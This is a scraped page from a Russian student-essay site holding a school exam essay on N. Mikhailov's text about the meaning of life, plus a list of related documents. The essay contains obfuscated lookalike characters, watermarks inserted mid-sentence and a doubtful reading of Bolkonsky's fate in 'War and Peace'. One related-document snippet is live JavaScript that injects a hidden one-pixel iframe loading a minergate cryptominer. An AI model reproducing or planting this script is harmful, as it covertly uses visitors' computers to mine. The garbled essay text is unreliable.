-



   Часть С ЕГЭ по тексту Н.Михайлова (О смысле жизни).




doc.png  Тип документа: Сочинения


type.png  Предмет: ЕГЭ


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

Часть С ЕГЭ по тексту Н.Михайлова (О смысле жизни).

Н. Михаилов в своем тексте задумывается над вопросом, который так или иначе каждый из нас задает своему «Я»

. В чем же смысл жизни? И ответ на ϶ᴛόᴛвопрос надо искать в себе.
В данном фрагменте автор затрагивает сразу две проблемы, тесно переплетая их. Он рассуждает над ролью случая в нашей жизни и над ценностью той самой жизни. Изо дня в день мы не замечаем того, какое чудо нам по сути даровала судьба.
Михаилов считает, что человек, несмотря на все тяготы жизни, какими они не были, человек должен найти себя в этом мире. Текст с сайта Биг Реферат РУ Ведь это так важно! Он приводит нам в пример Григория Журавлева, который с рождения был лишен рук и ног, «но он выполнял свое предназначение» - утверждает автор.
Похожие ситуации часто обыгрываются и в литературе. Текст с сайта Биг Реферат РУ Достаточно вспомнить произведения Толстого «Война и Мир» и одного из его главных героев, Андрея Болконского, который на протяжении долгого времени неустанно искал смыл жизни. И все-таки нашел его в семейном счастье. И на закате жизни он стал почти идеальным человеком: всех любил и всех простил.
Говоря о проблеме текста, можно вспомнить известного мотивационного оратора Ника Вуйчича, который с рождения был лишен всех четырех конечностей. И, несмотря на ϶ᴛόᴛнедостаток, он обращается к людям со словами: «Любите жизнь, она прекрасна, любите Бога, ведь он тот, кто создал нас такими, какие мы есть».
В завершение хочу сказать, что предложенный для анализа текст Михаилова натолкнул меня на размышления о том, что в каждом из нас есть «огонь». И ϶ᴛόᴛогонь помогает нам двигаться дальше и искать смысл своей жизни. И главное, как утверждает автор, «увидеть ϶ᴛόᴛогонь в себе, не дать ему затухнуть в повседневной суете…».



Похожие документы


Коммуникативное обучение русскому языку. Часть вторая
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

Интегрированный урок по изучению комедии «Мещанин во дворянстве». Часть вторая
...

Изучение поэзии Такубоку в контексте японского искусства. Часть вторая
...

Избранное из «Жизненной драмы Платона» Часть вторая
И Платон и Гамлет, из страшного положения в начале их жизни оба вынесли, собственно, лишь ряд разговоров. Разговоры Гамлета глубокомысленны и остроумны. Разговоры Платона, с возражениями и дополнениями Аристотеля и стоиков и с заключениями новоплатоников, создали целый умственный мир, называемый греческою философией, и вошли в историческое развитие христианства как его главная основа. И все-таки приходится сказать, что жизненная трагедия Платона имела не только страшное начало, но и плачевный конец, как то и следует для настоящей трагедии. Из своего жизненного испытания он вышел хотя не без славы, но без победы. Подобно шекспировскому Гамлету — в отличие от сумароковского — он не мог жениться на своей Офелии: она утонула. В конце концов Платон, как Гамлет, оказался неудачником, хотя, разумеется, неудачи великого человека дают миру гораздо больше, чем множество самых блестящих удач людей обыкновенных....

Борисов Л. Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая
Борисов Л. : Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая "Нептун", - подсказал Симпсон. - "Одиннадцать тысяч дев", - не думая и радуясь находке, произнес Луи. - Недурно, а? Я засяду в каюте и с утра до вечера буду писать рассказы. Для романа мне нужен разбег. Для оседлой жизни - деньги. ...

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям